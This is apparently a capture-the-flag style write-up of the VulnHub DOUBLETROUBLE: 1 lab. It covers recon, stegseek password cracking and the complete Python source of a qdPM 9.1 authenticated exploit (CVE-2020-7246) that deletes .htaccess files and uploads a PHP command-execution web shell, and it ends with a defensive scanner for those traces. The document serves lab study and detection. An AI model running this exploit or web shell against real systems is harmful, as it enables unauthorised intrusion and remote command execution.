VulnHub lab: DOUBLETROUBLE: 1

Preparation:
Attacker machines: a Kali VM and my Windows 10 host.
Target: DOUBLETROUBLE: 1. I set its network adapter to bridged, so it sits on the same subnet as my host. Download: https://download.vulnhub.com/doubletrouble/doubletrouble.ova; after downloading, open it directly in VirtualBox.
Knowledge points: installing and using stegseek, the qdPM 9.1 backdoor vulnerability, file transfer with nc, reverse shells, awk privilege escalation, Dirty COW privilege escalation (CVE-2016-5195), time-based SQL injection, and sqlmap usage.

Information gathering:
Scan the subnet with nmap for live hosts to identify the target: nmap -sn 192.168.4.0/24. Target address obtained: 192.168.4.195.
Scan the services behind the ports: nmap -T4 -sV -p- -A 192.168.4.195. Ports 22 and 80 are open, i.e. an SSH service and a web service.
Run a directory scan with dirmap to obtain a list of directories, then visit each one to test; in the end, /secret turns out to contain an image.
qdPM 9.1 unauthenticated access vulnerability:
Browsing to port 80 shows a login page that reveals the framework in use: qdPM 9.1. I had previously run into a qdPM 9.2 vulnerability and found that it exists here as well.
Search https://www.exploit-db.com/ for a usable exploit for qdPM 9.1. There is an unauthenticated access vulnerability that lets us read the /core/config/databases.yml file directly. Reading it yields the database username and password: otis/"<?php echo urlencode('rush') ; ?>". The database service is not exposed, though, so this information is probably useless; note it down anyway.
Extracting the hidden data from the image with stegseek:
Visiting the directories found by dirmap, there is an image under /secret. Download and save it; the image shows otis (the username mentioned above), rush (the parameter in the password), and similar hints.
Use steghide to check the file for hidden data: steghide info doubletrouble.jpg. There is embedded data, but without the passphrase it cannot be extracted, so try the steganography brute-forcing tool stegseek.
stegseek has to be installed manually on Kali: download stegseek_0.6-1.deb from https://github.com/RickdeJager/stegseek/releases and install it with sudo dpkg -i stegseek_0.6-1.deb. After installation, brute-force with a wordlist to recover the passphrase and the embedded file name, and with it the login account and password: otisrush@localhost.com/otis666. Command: stegseek --crack doubletrouble.jpg /usr/share/wordlists/rockyou.txt upfine.txt.
qdPM 9.1 backdoor vulnerability:
With the application login credentials otisrush@localhost.com/otis666 in hand, use the qdPM 9.1 backdoor vulnerability. Again, search https://www.exploit-db.com/ for a usable qdPM 9.1 exploit.
Download the exploit file 50175.py (I used the second result; its formatting was broken and had to be fixed by hand; the corrected source is below), then run it with the parameters: python 50175.py -url http://192.168.4.195/ -p otis666 -u otisrush@localhost.com. It returns a backdoor link; visiting that directory shows a file: 542451-backdoor.php.
qdPM 9.1 backdoor exploit source (50175.py as corrected):

# Exploit Title: qdPM 9.1 - Remote Code Execution (RCE) (Authenticated)
# Google Dork: intitle:qdPM 9.1. Copyright2020 qdpm.net
# Date: 2021-08-03
# Original Exploit Author: Rishal Dwivedi (Loginsoft)
# Original ExploitDB ID: 47954
# Exploit Author: Leon Trappett (thepcn3rd)
# Vendor Homepage: http://qdpm.net/
# Software Link: http://qdpm.net/download-qdpm-free-project-management
# Version: <=1.9.1
# Tested on: Ubuntu Server 20.04 (Python 3.9.2)
# CVE : CVE-2020-7246
# Exploit written in Python 3.9.2
# Tested Environment - Ubuntu Server 20.04 LTS
# Path Traversal + Remote Code Execution

#!/usr/bin/python3
import sys
import requests
from lxml import html
from argparse import ArgumentParser

session_requests = requests.session()


def multifrm(userid, username, csrftoken_, EMAIL, HOSTNAME, uservar):
    # Profile-update form with remove_photo set: the server deletes whatever
    # path is in photo_preview, which is the path traversal of CVE-2020-7246.
    request_1 = {
        'sf_method': (None, 'put'),
        'users[id]': (None, userid[-1]),
        'users[photo_preview]': (None, uservar),
        'users[_csrf_token]': (None, csrftoken_[-1]),
        'users[name]': (None, username[-1]),
        'users[new_password]': (None, ''),
        'users[email]': (None, EMAIL),
        'extra_fields[9]': (None, ''),
        'users[remove_photo]': (None, '1'),
    }
    return request_1


def req(userid, username, csrftoken_, EMAIL, HOSTNAME):
    # Remove the .htaccess files that block PHP execution under uploads/
    request_1 = multifrm(userid, username, csrftoken_, EMAIL, HOSTNAME, '.htaccess')
    new = session_requests.post(HOSTNAME + 'index.php/myAccount/update', files=request_1)
    request_2 = multifrm(userid, username, csrftoken_, EMAIL, HOSTNAME, '../.htaccess')
    new1 = session_requests.post(HOSTNAME + 'index.php/myAccount/update', files=request_2)
    # Upload the PHP file as the user's photo
    request_3 = {
        'sf_method': (None, 'put'),
        'users[id]': (None, userid[-1]),
        'users[photo_preview]': (None, ''),
        'users[_csrf_token]': (None, csrftoken_[-1]),
        'users[name]': (None, username[-1]),
        'users[new_password]': (None, ''),
        'users[email]': (None, EMAIL),
        'extra_fields[9]': (None, ''),
        'users[photo]': ('backdoor.php', '<?php if(isset($_REQUEST[\'cmd\'])){ echo "<pre>"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo "</pre>"; die; }?>', 'application/octet-stream')
    }
    upload_req = session_requests.post(HOSTNAME + 'index.php/myAccount/update', files=request_3)


def main(HOSTNAME, EMAIL, PASSWORD):
    # Log in with the supplied account, carrying the CSRF token from the form
    url = HOSTNAME + '/index.php/login'
    result = session_requests.get(url)
    #print(result.text)
    login_tree = html.fromstring(result.text)
    authenticity_token = list(set(login_tree.xpath("//input[@name='login[_csrf_token]']/@value")))[0]
    payload = {'login[email]': EMAIL, 'login[password]': PASSWORD, 'login[_csrf_token]': authenticity_token}
    result = session_requests.post(HOSTNAME + '/index.php/login', data=payload, headers=dict(referer=HOSTNAME + '/index.php/login'))
    # The designated admin account does not have a myAccount page
    account_page = session_requests.get(HOSTNAME + 'index.php/myAccount')
    account_tree = html.fromstring(account_page.content)
    userid = account_tree.xpath("//input[@name='users[id]']/@value")
    username = account_tree.xpath("//input[@name='users[name]']/@value")
    csrftoken_ = account_tree.xpath("//input[@name='users[_csrf_token]']/@value")
    req(userid, username, csrftoken_, EMAIL, HOSTNAME)
    # Read back the stored photo name to learn where the file landed
    get_file = session_requests.get(HOSTNAME + 'index.php/myAccount')
    final_tree = html.fromstring(get_file.content)
    backdoor = final_tree.xpath("//input[@name='users[photo_preview]']/@value")
    print('Backdoor uploaded at - > ' + HOSTNAME + '/uploads/users/' + backdoor[-1] + '?cmd=whoami')


if __name__ == '__main__':
    print("You are not able to use the designated admin account because they do not have a myAccount page.\n")
    parser = ArgumentParser(description='qdmp - Path traversal + RCE Exploit')
    parser.add_argument('-url', '--host', dest='hostname', help='Project URL')
    parser.add_argument('-u', '--email', dest='email', help='User email (Any privilege account)')
    parser.add_argument('-p', '--password', dest='password', help='User password')
    args = parser.parse_args()
    # Added detection if the arguments are passed and populated, if not display the arguments
    if (len(sys.argv) > 1 and isinstance(args.hostname, str) and isinstance(args.email, str) and isinstance(args.password, str)):
        main(args.hostname, args.email, args.password)
    else:
        parser.print_help()
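As an added defender-side example (not part of the original post and not the exploit's own code), the script below sweeps a qdPM web root for the footprint the exploit above leaves: the two .htaccess files it deletes via photo_preview ('.htaccess' and '../.htaccess') and a non-image file under uploads/users/. The web root layout, the expected .htaccess locations and the sample files are constructed assumptions.

```python
import os
import tempfile

# Signatures an avatar upload should start with (JPEG, PNG, GIF).
IMAGE_MAGIC = (b"\xff\xd8\xff", b"\x89PNG\r\n\x1a\n", b"GIF87a", b"GIF89a")
SCRIPT_EXT = {".php", ".phtml", ".phar", ".php5"}
# Files the exploit removes with photo_preview='.htaccess' / '../.htaccess' (assumed locations).
EXPECTED_HTACCESS = ("uploads/.htaccess", "uploads/users/.htaccess")


def scan_uploads(webroot):
    """Return sorted (relative path, reason) pairs for every artifact found."""
    findings = []
    for rel in EXPECTED_HTACCESS:
        if not os.path.isfile(os.path.join(webroot, rel)):
            findings.append((rel, "missing .htaccess (PHP execution no longer blocked)"))
    users = os.path.join(webroot, "uploads", "users")
    names = sorted(os.listdir(users)) if os.path.isdir(users) else []
    for name in names:
        full = os.path.join(users, name)
        if not os.path.isfile(full):
            continue
        rel = "uploads/users/" + name
        ext = os.path.splitext(name)[1].lower()
        with open(full, "rb") as f:
            data = f.read()
        if ext in SCRIPT_EXT:
            findings.append((rel, "script extension in avatar directory"))
        elif name != ".htaccess" and not data.startswith(IMAGE_MAGIC):
            findings.append((rel, "not an image"))
        elif b"<?php" in data:
            findings.append((rel, "PHP tag inside image"))
    return sorted(findings)


def restore_htaccess(webroot):
    """Recreate both .htaccess files (constructed content) so uploads stay inert."""
    for rel in EXPECTED_HTACCESS:
        with open(os.path.join(webroot, rel), "w") as f:
            f.write("php_flag engine off\n")


def build_sample_tree():
    """Constructed sample web root: one real avatar, no .htaccess, one dropped PHP file."""
    root = tempfile.mkdtemp(prefix="qdpm_webroot_")
    users = os.path.join(root, "uploads", "users")
    os.makedirs(users)
    with open(os.path.join(users, "avatar.jpg"), "wb") as f:
        f.write(b"\xff\xd8\xff\xe0" + b"\x00" * 16)
    with open(os.path.join(users, "542451-backdoor.php"), "w") as f:
        f.write("<?php echo 'constructed marker'; ?>\n")
    return root
```

Run scan_uploads() against the real web root on a schedule, or compare its output with a known-good baseline after any profile-update request.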
